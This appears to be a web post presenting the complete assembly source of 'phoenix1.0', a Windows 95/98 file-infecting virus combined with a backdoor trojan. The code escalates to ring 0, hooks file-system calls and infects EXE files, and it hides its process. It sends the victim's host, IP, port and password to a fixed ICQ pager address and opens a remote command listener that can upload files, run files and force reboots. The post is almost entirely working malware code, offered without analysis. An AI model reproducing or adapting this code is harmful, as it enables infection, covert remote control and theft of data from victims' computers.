一只真正的木马病毒的汇编源代码



;=====================木马?病毒?Either is ?你看着办吧*_*..^..(这只病毒从未见过天日...我要说什么你应该知道的)=========
;========windows 95 / 98 PE virus and a trj for win9x==========
;========it named phoenix1.0 by suruixuan======
;========some codes copy from some great viruses codes=======
;========一些代码是copy来的,望大家见谅=======



.586
.model flat, stdcall

include windows.inc
include kernel32.inc
includelib kernel32.lib
include user32.inc
includelib user32.lib
include wsock32.inc
includelib wsock32.lib
include shell32.inc
includelib shell32.lib
include advapi32.inc
includelib advapi32.lib
include masm32.inc
includelib masm32.lib

RegOperation PROTO :DWORD, :DWORD, :DWORD, :DWORD

WRITE equ 1
DEL equ 0

.data

;hiding
kernel32 db 'kernel32.dll', 0
func db 'RegisterServiceProcess', 0

;icq notify
useicq db '1', 0
icqip db '205.188.147.55', 0
icqstr db 'GET /scripts/WWPMsg.dll?from=Asylum&fromemail=Asylum&subject='
db 'OnlineNotification&body=hey+there,+ive+been+committed...+[name=%s]_'
db '[hostname=%s]_[ip=%s]_[port=%s]_[password=%s]_[version=0.1.2]_'
db '[winver=%s]&to=%s HTTP/1.0', 13, 10, 13, 10, 13, 10, 0
uin db '1234567icq', 0

;startup stuff
dirfmt db '%s\%s', 0
filename db 'wincmp32.exe', 0
sysinifmt db '%s\system.ini', 0
wininifmt db '%s\win.ini', 0
explorer db 'explorer.exe %s', 0
boot db 'boot', 0
shell db 'shell', 0
windows db 'windows', 0
load db 'load', 0
run db 'run', 0
regkey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\%s', 0
runkey db 'Run\', 0
runsrvkey db 'RunServices\', 0
runkeyname db 'RegistryKeyName1234567890', 0
runsrvname db 'RegistryKeyName1234567890', 0
regusername db 'RegistryKeyName1234567890', 0
pass db '1', 0
reguser db '1', 0
regrunstart db '1', 0
runsrvstart db '1', 0
sysinistart db '1', 0
winloadstart db '1', 0
winrunstart db '1', 0

;connection stuff
srvname db '12345678901234567vic', 0
password db '1234567890123456pass', 0
mainport db '23432', 0

;misc
space db ' ', 0
question db '?', 0
truth db '1', 0
fals db '0', 0
na db 'n/a', 0
fmt db '%s %s', 0

;os version
ninefive db '95', 0
nineeight db '98', 0
nt db 'NT%i(%lu)', 0

;server commands
rqscmd db 'RQS', 0 ;request (to connect)
pascmd db 'PAS', 0 ;password
diecmd db 'DIE', 0 ;remove ye ol' server
uplcmd db 'UPL', 0 ;upload
rbtcmd db 'RBT', 0 ;reboot
wdrcmd db 'WDR', 0 ;windows directory
sdrcmd db 'SDR', 0 ;system directory
runcmd db 'RUN', 0 ;run file
invcmd db 'INV', 0 ;invalid command

.data?

;buffers!
exename db 128 dup (?)
sysiniloc db 128 dup (?)
wininiloc db 128 dup (?)
sysinistr db 128 dup (?)
regbuff db 128 dup (?)
windir db 128 dup (?)
sysdir db 128 dup (?)
copystr db 128 dup (?)

;socket stuff
mainsock dd ?
wsainfo WSADATA<>
mainsin sockaddr_in<>
icqsin sockaddr_in<>
clientinfo sockaddr_in<>

;hiding
RSP dd ?

;os version
osinfo OSVERSIONINFO<>

;startup stuff
reghand dd ?

;thread stuff
recvthread dd ?
icqthread dd ?

.code
NOTDATA_SIZE = OFFSET CVSIZE-OFFSET NOTDATA ;变形数据大小
CV_SIZE = OFFSET CVSIZE-OFFSET START ;病度大小
MYCODE_MEM_OFF = 401000H

;*****************************************
;*PE Section 格式 *
;*****************************************
SECTION_NAME = 00H
VIRTUAL_SIZE = 08H
VIRTUAL_ADDRESS = 0CH
PHYS_SIZE = 10H
PHYS_ADDRESS = 14H
CHARACTERISTICS = 24H
;*****************************************
;*PE Section 格式 *
;*****************************************


;*****************************************
;*引导块开始 *
;*****************************************
START :call trj
PUSHAD
MOV ESI,EAX

PUSH EAX
SIDT FWORD PTR [ESP-2]
POP EBX

ADD EBX,3*8H
MOV EBP,[EBX+4]
MOV BP,[EBX]
MOV EAX,EBP

JMP NEXTCODE1
DW 87C1H ;迷惑静态反编译
NEXTCODE1:
SHR EAX,18H
OR AL,AL
JZ STAYED_IN_MEM

CLI
LEA EAX,ESI[RING0-START]
MOV [EBX],AX
SHR EAX,10H
MOV [EBX+6],AX
STI
INT 3H
STAYED_IN_MEM:
POPAD
MOV EAX,NOT(MYCODE_MEM_OFF+OFFSET AGAIN-OFFSET START)
OLD_EP = DWORD PTR $-4
NOT EAX
AGAIN: JMP EAX
DW 87C7H
RING0: XOR ECX,ECX
PUSH 0FH
PUSH ECX
PUSH 0FFH
PUSH ECX
PUSH ECX
PUSH ECX
PUSH 01H
PUSH 02H
INT20_01_53:
INT 20H
DW 53H
DW 01H
ADD ESP,20H

OR EDX,EDX
JNZ ENOUGH_MEM
CLI
MOV [EBX],BP
SHR EBP,10H
MOV [EBX+6],BP
STI
IRETD
DW 87C7H
ENOUGH_MEM:
MOV EDI,EDX
MOV ECX,CV_SIZE
CLD
REP MOVSB
MOV EDI,EDX

LEA EAX,EDI[NEWAPI-START]
PUSH EAX
INT20_40_67:
INT 20H
DW 0067H
DW 0040H ;InstallFileSystemApiHook
ADD ESP,4

MOV EDI[OLDAPI-START],EAX
MOV EDI[DELTA-START],EDI

MOV AX,20CDH
MOV EDI[INT20_01_53-START ],AX ;PageAlloc
MOV EDI[INT20_01_53-START+2],DWORD PTR 00010053H
MOV EDI[INT20_40_32-START ],AX ;IFSMgr_FileIO
MOV EDI[INT20_40_32-START+2],DWORD PTR 00400032H
MOV EDI[INT20_40_41-START ],AX ;BcsToUni
MOV EDI[INT20_40_41-START+2],DWORD PTR 00400041H
MOV EDI[ENTERF-START],BYTE PTR 0

MOV ECX,NOTDATA_SIZE
ADD EDI,OFFSET NOTDATA - OFFSET START
NOT_LOOP:
MOV AL,[EDI]
NOT AL
MOV EDI[DATA-NOTDATA],AL
INC EDI
DEC ECX
JECXZ NOT_END
JMP NOT_LOOP
DW 87C7H
NOT_END:
IRETD
;*****************************************
;*引导块结束 *
;*****************************************

;*****************************************
;*文件系统挂钩函数SystemFileApiHook开始 *
;*****************************************
;-------进入处理--------------------------
NEWAPI: PUSHAD
MOV EDI,0
DELTA = DWORD PTR $-4
MOV DR0,EDI
MOV EBX,ESP

CMP EDI[ENTERF-START],BYTE PTR 0
JZ I_AM_FREE

PUSH DWORD PTR [EBX+20H+4H+14H]
CALL [EBX+20H+4H]
POP ECX
MOV [EBX+1CH],EAX

CMP DWORD PTR [EBX+20H+4H+04H],24H
JNZ QUITFSH
MOV EAX,[ECX+28H]
MOV EDI[FILEMODI-START],EAX
QUITFSH:POPAD
RET
DW 87C7H
I_AM_FREE:
CMP DWORD PTR [EBX+20H+4H+04H],24H
JNZ CALLOLDAPI
MOV EDI[ENTERF-START],BYTE PTR 1

; ------进入处理--------------------------
LEA ESI,EDI[BUFFER-START]
MOV EAX,[EBX+20H+4H+8H]
CMP AL,0FFH
JZ JPDRV
ADD AL,40H
MOV [ESI],AL
INC ESI
MOV [ESI],BYTE PTR ':'
INC ESI
JPDRV: SUB EAX,EAX
PUSH EAX
PUSH 0FFH
MOV EBX,[EBX+20H+4+14H]
MOV EAX,[EBX+0CH]
INC EAX ;ADD EAX,4
INC EAX
INC EAX
INC EAX

PUSH EAX
PUSH ESI
INT20_40_41:
INT 20H
DW 0041H
DW 0040H
ADD ESP,10H
INC EAX
INC EAX
DEC ESI
DEC ESI

ADD EDI,OFFSET FILENAME-OFFSET START
MOV ECX,EAX
CLD
REP MOVSB
MOV [ESI],CL
MOV [EDI],CL
MOV EDI,DR0
CMP_EXE:
MOV ESI,DR1
MOV EAX,NOT('EXE.') ;是否为EXE文件
NOT EAX
CMP [ESI-4],EAX
JNZ EXITAPI
CALL INF_EXE

;-------退出处理--------------------------
EXITAPI:MOV EDI,DR0
MOV EDI[ENTERF-START],BYTE PTR 0
CALLOLDAPI:
POPAD
MOV EAX,0
OLDAPI = DWORD PTR $-4
JMP [EAX]

;-------退出处理--------------------------
;*****************************************
;*文件系统挂钩函数SystemFileApiHook结束 *
;*****************************************
;-------感染EXE文件---------------
INF_EXE:
MOV EDI,DR0
XOR EAX,EAX
MOV DR2,EAX

MOV AX,4300H
LEA ESI,EDI[FILENAME-START]
CALL INT20_40_32
JC EXIT_INF_EXE
MOV DR1,ECX

MOV AX,4301H
XOR ECX,ECX
CALL INT20_40_32
JC EXIT_INF_EXE

MOV AX,0D500H
SUB ECX,ECX
XOR EDX,EDX ;MOV EDX,01H
INC EDX
MOV EBX,EDX ;MOV EBX,02H
INC EBX
LEA ESI,EDI[FILENAME-START]
CALL INT20_40_32
JC RET_ATTRIB
MOV EBX,EAX

XOR ECX,ECX ;MOV ECX,04H
MOV CL ,04H
XOR EDX,EDX ;MOV EDX,3CH
MOV DL ,3CH

LEA ESI,EDI[PEFILE_PTR-START]
CALL READFILE
JC NFIND

XOR ECX,ECX ;MOV ECX,60H
MOV CL ,60H
MOV EDX,EDI[PEFILE_PTR-START]
LEA ESI,EDI[BUFFER-START]
CALL READFILE

MOV AX,NOT('EP') ;判断是否为PE文件
NOT AX
CMP [ESI],AX
JNZ NFIND

MOV EAX,[ESI+28H]
MOV EDI[OLD_EP-START],EAX ;读 OLD_EP

MOV EAX,[ESI+34H]
MOV EDI[IMAGEBASE-START],EAX ;读 IMAGEBASE
ADD EDI[OLD_EP-START],EAX
NOT DWORD PTR EDI[OLD_EP-START]

MOV EAX,[ESI+3CH] ;读 FILEALIGNMENT
MOV EDI[FILEALIGNMENT-START],EAX

XOR EAX,EAX
MOV AX,[ESI+06H] ;读 SECTION_N
MOV EDI[SECTION_N-START],AX

XOR ECX,ECX ;MOV ECX,28H ;GET SECTION_SIZE
MOV CL ,28H
MUL ECX
MOV ECX,EAX
MOV EDI[SECTION_SIZE-START],ECX

XOR EDX,EDX
ADD DX,[ESI+14H]
ADD EDX,18H
ADD EDX,EDI[PEFILE_PTR-START] ;GET SECTION_POSITION
MOV EDI[SFILE_PTR-START],EDX

LEA ESI,EDI[BUFFER-START] ;读取Sections
CALL READFILE

MOV EDX,[ESI+3CH] ;如果是ZIP自解压则不感染
MOV ECX,4 ;ZIP自解压文件的标志是SECTION_2
LEA ESI,EDI[BUFFER-START+4F0H] ;的前4字节是否为0xFFFFFFFF
CALL READFILE
MOV EDX,[ESI]
INC EDX
OR EDX,EDX
JZ NFIND

LEA ESI,EDI[BUFFER-START]
MOV AX,EDI[SECTION_N-START]
SECT_LOOP:
OR AX,AX
JZ TEST_LAST_SECTION
CMP [ESI+VIRTUAL_SIZE],DWORD PTR 0
JZ PHYS_B_VIRS
MOV EDX,[ESI+PHYS_SIZE]
SUB EDX,[ESI+VIRTUAL_SIZE]
JS PHYS_B_VIRS
CMP EDX,CV_SIZE
JA FINDSECTION
PHYS_B_VIRS:
DEC AX
ADD ESI,28H
JMP SECT_LOOP
DW 87C7H
TEST_LAST_SECTION:
SUB ESI,28H
MOV AX,0D800H
CALL INT20_40_32

MOV EDX,[ESI+PHYS_ADDRESS]
ADD EDX,[ESI+PHYS_SIZE ]
CMP EAX,EDX
JNZ NFIND

MOV EDX,[ESI+VIRTUAL_SIZE]
OR EDX,EDX
JZ NFIND
MOV EAX,[ESI+PHYS_SIZE]
CMP EAX,EDX
JBE NFIND

XOR EDX,EDX
MOV EAX,CV_SIZE
MOV ECX,EDI[FILEALIGNMENT-START]
DIV ECX
INC EAX
MUL ECX
PUSH EAX

ADD [ESI+PHYS_SIZE],EAX
MOV EAX,[ESI+VIRTUAL_ADDRESS]
ADD EAX,[ESI+PHYS_SIZE]
MOV EDI[SIZEOFIMAGE-START],EAX


PUSH ESI
MOV EDX,EDI[PEFILE_PTR-START]
ADD EDX,50H
MOV ECX,4
LEA ESI,EDI[SIZEOFIMAGE-START]
CALL WRITEFILE
XOR EAX,EAX
INC EAX
MOV DR2,EAX
POP ESI
POP EAX
JC RET_ATTRIB

MOV EDX,[ESI+PHYS_SIZE]
SUB EDX,EAX
JMP WRITE2FILE
DW 87C7H
FINDSECTION:
MOV EDX,[ESI+PHYS_SIZE]
SUB EDX,CV_SIZE

WRITE2FILE:
MOV EAX,[ESI+PHYS_SIZE]
MOV [ESI+VIRTUAL_SIZE],EAX
MOV [ESI+CHARACTERISTICS],DWORD PTR 0E0000040H ;(0E0000040H)数据可读可写可执行

MOV EAX,[ESI+VIRTUAL_ADDRESS]
ADD EAX,EDX
MOV EDI[NEW_EP-START],EAX

ADD EDX,[ESI+PHYS_ADDRESS]
MOV ECX,CV_SIZE
MOV ESI,EDI ;写自身
CALL WRITEFILE
JC RET_ATTRIB

MOV ECX,EDI[SECTION_SIZE-START]
MOV EDX,EDI[SFILE_PTR-START] ;写 SECTION
LEA ESI,EDI[BUFFER-START]
CALL WRITEFILE

XOR ECX,ECX ;MOV ECX,4
MOV CL,04H
MOV EDX,EDI[PEFILE_PTR-START] ;写 NEW_EP
ADD EDX,28H
LEA ESI,EDI[NEW_EP-START]
CALL WRITEFILE

NFIND: MOV AX,0D700H
CALL INT20_40_32

RET_ATTRIB:
MOV AX,4301H
LEA ESI,EDI[FILENAME-START]
MOV ECX,DR1
CALL INT20_40_32

MOV EAX,DR2 ;判断是否文件已被修改
OR EAX,EAX
JNZ EXIT_INF_EXE

MOV AX,4303H
MOV ECX,EDI[FILEMODI-START ] ;改回文件修改日期
MOV EDI,EDI[FILEMODI-START+2]
CALL INT20_40_32

EXIT_INF_EXE:
RET
;-------感染EXE文件--------------
;--------------------------------
WRITEFILE:
MOV AX,0D601H
JMP INT20_40_32
DW 87C7H
READFILE:MOV AX,0D600H
INT20_40_32:
INT 20H
DW 32H
DW 40H
RET
;--------------------------------
CVSIZE:
ENTERF DB 0 ;进入标志
SECTION_N DW 0 ;块个数
SECTION_SIZE DD 0 ;块大小
PEFILE_PTR DD 0 ;PE文件指针
SFILE_PTR DD 0 ;SECTION文件指针
FILEALIGNMENT DD 0 ;文件对齐因子
IMAGEBASE DD 0 ;基地址
NEW_EP DD 0 ;新入口
SIZEOFIMAGE DD 0 ;IMAGE大小
FILEMODI DD 0 ;文件修改日期

FILENAME DB 100H DUP(0) ;被拦截的文件名
BUFFER DB 500H DUP(0) ;缓冲区

;---------------------木马部分-----------------------------
trj:
invoke GetModuleHandle, offset kernel32
invoke GetProcAddress, eax, offset func
cmp eax, 0
je isnt
mov [RSP], eax
push 1
push 0
call RSP

isnt:
invoke atodw, offset useicq
cmp eax, 1
jne mainsock_listen
mov eax, offset ICQNotify
invoke CreateThread, NULL, NULL, eax, offset uin, 0, offset icqthread
invoke CloseHandle, eax


mainsock_listen:
invoke WSAStartup, 101h, offset wsainfo
cmp eax, 0
jne restartloop
invoke socket, PF_INET, SOCK_STREAM, 0
cmp eax, INVALID_SOCKET
je restartloop
mov mainsock, eax
mov mainsin.sin_family, PF_INET
invoke atodw, offset mainport
invoke htons, eax
mov mainsin.sin_port, ax
mov mainsin.sin_addr, INADDR_ANY
invoke bind, mainsock, offset mainsin, sizeof mainsin
cmp eax, SOCKET_ERROR
je restartloop

acceptloop:
invoke listen, mainsock, SOMAXCONN
invoke accept, mainsock, offset clientinfo, NULL
cmp eax, INVALID_SOCKET
je acceptloop
mov edx, offset RecvData
invoke CreateThread, NULL, 0, edx, eax, 0, offset recvthread
invoke CloseHandle, eax
jmp acceptloop

restartloop:
invoke closesocket, mainsock
invoke Sleep, 512
jmp mainsock_listen

RecvData PROC remoteaddr:DWORD
LOCAL authed:DWORD
LOCAL clientpc:DWORD
LOCAL recvbuff[1024]:BYTE
LOCAL sendbuff[1024]:BYTE
LOCAL moobuff[1024]:BYTE
LOCAL parambuff[256]:BYTE
LOCAL fsize[16]:BYTE
LOCAL cmdbuff[3]:BYTE
LOCAL bytesdone:DWORD
LOCAL buffwrite:DWORD
LOCAL uplfile:DWORD
LOCAL fsizeint:DWORD
mov authed, 0
mov edx, remoteaddr
mov clientpc, edx
invoke atodw, offset pass
cmp eax, 1
jne grant

sendpass:
invoke lstrlen, offset pascmd
invoke send, clientpc, offset pascmd, eax, 0

receiveloop:
invoke RtlZeroMemory, addr recvbuff, 1024
invoke RtlZeroMemory, addr sendbuff, 1024
invoke recv, clientpc, addr recvbuff, 1024, 0
cmp eax, SOCKET_ERROR
je endloop
cmp eax, 0
je endloop
invoke midstr, addr recvbuff, addr cmdbuff, 0, 3 ;cut off the command part

invoke lstrcmpi, addr cmdbuff, offset diecmd ;kill server
cmp eax, 0
jne reboot
cmp authed, 1
jne sendpass
invoke atodw, offset sysinistart
cmp eax, 1
jne cont7
invoke wsprintf, addr sysinistr, offset explorer, offset space
invoke WritePrivateProfileString, offset boot, offset shell, addr sysinistr,\
offset sysiniloc

cont7:
invoke atodw, offset winloadstart
cmp eax, 1
jne cont8
invoke WritePrivateProfileString, offset windows, offset load, offset space,\
offset wininiloc

cont8:
invoke atodw, offset winrunstart
cmp eax, 1
jne cont9
invoke WritePrivateProfileString, offset windows, offset run, offset space,\
offset wininiloc

cont9:
invoke atodw, offset regrunstart
cmp eax, 1
jne cont10
invoke RegOperation, HKEY_LOCAL_MACHINE, offset runkey, offset runkeyname, DEL

cont10:
invoke atodw, offset runsrvstart
cmp eax, 1
jne cont11
invoke RegOperation, HKEY_LOCAL_MACHINE, offset runsrvkey, offset runsrvname, DEL

cont11:
invoke atodw, offset reguser
cmp eax, 1
jne exit
invoke RegOperation, HKEY_CURRENT_USER, offset runkey, offset regusername, DEL

exit:
invoke ExitProcess, 0

reboot:
invoke lstrcmpi, addr cmdbuff, offset rbtcmd ;reboot
cmp eax, 0
jne windirectory
cmp authed, 1
jne sendpass

rebootloop:
invoke ExitWindowsEx, EWX_SHUTDOWN or EWX_FORCE, NULL
invoke ExitWindowsEx, EWX_POWEROFF or EWX_FORCE, NULL
invoke ExitWindowsEx, EWX_REBOOT or EWX_FORCE, NULL
invoke ExitWindowsEx, EWX_LOGOFF or EWX_FORCE, NULL
jmp rebootloop

windirectory:
invoke lstrcmpi, addr cmdbuff, offset wdrcmd ;windows directory
cmp eax, 0
jne sysdirectory
cmp authed, 1
jne sendpass
invoke wsprintf, addr sendbuff, offset fmt, offset wdrcmd, offset windir
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

sysdirectory:
invoke lstrcmpi, addr cmdbuff, offset sdrcmd ;system directory
cmp eax, 0
jne upload
cmp authed, 1
jne sendpass
invoke GetSystemDirectory, offset sysdir, 128
invoke wsprintf, addr sendbuff, offset fmt, offset sdrcmd, offset sysdir
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

upload:
invoke lstrcmpi, addr cmdbuff, offset uplcmd ;upload
cmp eax, 0
jne runfile
cmp authed, 1
jne sendpass
invoke lstrcpy, addr moobuff, addr recvbuff
invoke InString, 1, addr recvbuff, offset question
dec eax
invoke lstr, addr recvbuff, addr parambuff, eax
invoke midstr, addr parambuff, addr parambuff, 4, 128
invoke CreateFile, addr parambuff, GENERIC_WRITE, FILE_SHARE_READ or\
FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov uplfile, eax
invoke InString, 1, addr moobuff, offset question
invoke midstr, addr moobuff, addr fsize, eax, 128
invoke atodw, addr fsize
mov fsizeint, eax
mov bytesdone, 0

uploadloop:
invoke RtlZeroMemory, addr recvbuff, 1024
invoke recv, clientpc, addr recvbuff, 1024, 0
cmp eax, SOCKET_ERROR
je upldone
cmp eax, 0
je upldone
mov edx, eax
add bytesdone, eax
invoke WriteFile, uplfile, addr recvbuff, edx, addr buffwrite, NULL
mov edx, fsizeint
cmp bytesdone, edx
jnae uploadloop

upldone:
invoke CloseHandle, uplfile
jmp receiveloop

runfile:
invoke lstrcmpi, addr cmdbuff, offset runcmd ;run file
cmp eax, 0
jne passwerd
cmp authed, 1
jne sendpass
invoke RtlZeroMemory, addr parambuff, 256
invoke midstr, addr recvbuff, addr parambuff, 4, 128
invoke ShellExecute, NULL, NULL, addr parambuff, NULL, NULL, SW_SHOWNORMAL
cmp eax, 32
jb runfail
invoke wsprintf, addr sendbuff, offset fmt, offset runcmd, offset truth
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

runfail:
invoke wsprintf, addr sendbuff, offset fmt, offset runcmd, offset fals
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

passwerd:
invoke lstrcmpi, addr cmdbuff, offset pascmd ;get password
cmp eax, 0
jne invalid
invoke RtlZeroMemory, addr parambuff, 256
invoke midstr, addr recvbuff, addr parambuff, 4, 20
invoke lstrcmp, offset password, addr parambuff
cmp eax, 0
jne deny

grant:
invoke wsprintf, addr sendbuff, offset fmt, offset rqscmd, offset truth
invoke send, clientpc, addr sendbuff, eax, 0
mov authed, 1
jmp receiveloop

deny:
invoke wsprintf, addr sendbuff, offset fmt, offset rqscmd, offset fals
invoke send, clientpc, addr sendbuff, eax, 0
mov authed, 0
jmp endloop

invalid:
invoke wsprintf, addr sendbuff, offset fmt, offset invcmd, addr cmdbuff
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

endloop:
invoke closesocket, clientpc
mov eax, TRUE
ret
RecvData ENDP

ICQNotify PROC icqnumber:DWORD
LOCAL osverbuff[8]:BYTE
LOCAL hostbuff[128]:BYTE
LOCAL icqsendbuff[256]:BYTE
LOCAL icqsock:DWORD

icq_notify:
invoke WSAStartup, 101h, offset wsainfo
cmp eax, 0
jne restarticqloop
invoke socket, PF_INET, SOCK_STREAM, 0
cmp eax, INVALID_SOCKET
je restarticqloop
mov icqsock, eax
mov icqsin.sin_family, PF_INET
invoke htons, 80
mov icqsin.sin_port, ax
invoke inet_addr, offset icqip
mov icqsin.sin_addr, eax
invoke connect, icqsock, offset icqsin, sizeof icqsin
cmp eax, SOCKET_ERROR
je restarticqloop
mov osinfo.dwOSVersionInfoSize, sizeof OSVERSIONINFO
invoke GetVersionEx, offset osinfo
cmp osinfo.dwPlatformId, VER_PLATFORM_WIN32_NT
jne win9x
invoke wsprintf, addr osverbuff, offset nt, osinfo.dwMajorVersion, osinfo.dwBuildNumber
jmp continue

win9x:
cmp osinfo.dwMinorVersion, 0
jne win98
invoke lstrcpy, addr osverbuff, offset ninefive
jmp continue

win98:
invoke lstrcpy, addr osverbuff, offset nineeight
invoke atodw, offset pass
cmp eax, 1
je continue
invoke lstrcpy, offset password, offset na

continue:
invoke gethostname, addr hostbuff, 128
invoke gethostbyname, addr hostbuff
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
invoke inet_ntoa, eax
mov edx, eax
invoke wsprintf, addr icqsendbuff, offset icqstr, offset srvname, addr hostbuff, edx,\
offset mainport, offset password, addr osverbuff,\
icqnumber
invoke send, icqsock, addr icqsendbuff, eax, 0
cmp eax, SOCKET_ERROR
je restarticqloop
invoke closesocket, icqsock
ret

restarticqloop:
invoke closesocket, icqsock
invoke Sleep, 512
jmp icq_notify
ICQNotify ENDP

RegOperation PROC regroot:DWORD, magickey:DWORD, nameofkey:DWORD, operation:DWORD
invoke wsprintf, offset regbuff, offset regkey, magickey
invoke RegOpenKeyEx, regroot, offset regbuff, 0, KEY_WRITE, offset reghand
cmp operation, WRITE
je write
invoke RegDeleteValue, reghand, nameofkey
jmp endproc

write:
invoke lstrlen, offset copystr
invoke RegSetValueEx, reghand, nameofkey, 0, REG_SZ, offset copystr, eax

endproc:
invoke RegCloseKey, reghand
ret
RegOperation ENDP

end start
 
